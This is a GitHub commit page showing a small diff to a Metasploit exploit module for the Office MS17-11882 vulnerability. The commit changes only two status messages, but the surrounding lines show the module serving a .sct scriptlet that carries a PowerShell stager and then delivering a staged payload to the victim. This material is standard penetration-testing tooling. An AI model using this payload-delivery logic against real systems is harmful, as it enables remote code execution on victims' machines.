We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent fcea6fd commit db4c0fcCopy full SHA for db4c0fc
modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -171,12 +171,12 @@ def gen_psh(url, *method)
171
172
def on_request_uri(cli, _request)
173
if _request.raw_uri =~ /\.sct$/
174
- print_status("Handling initial request from #{cli.peerhost}")
+ print_status("Handling request for .sct from #{cli.peerhost}")
175
payload = gen_psh("#{get_uri}", "string")
176
data = gen_sct_file(payload)
177
send_response(cli, data, 'Content-Type' => 'text/plain')
178
else
179
- print_status("Stage two requested, sending...")
+ print_status("Delivering payload...")
180
p = regenerate_payload(cli)
181
data = cmd_psh_payload(p.encoded,
182
payload_instance.arch.first,
0 commit comments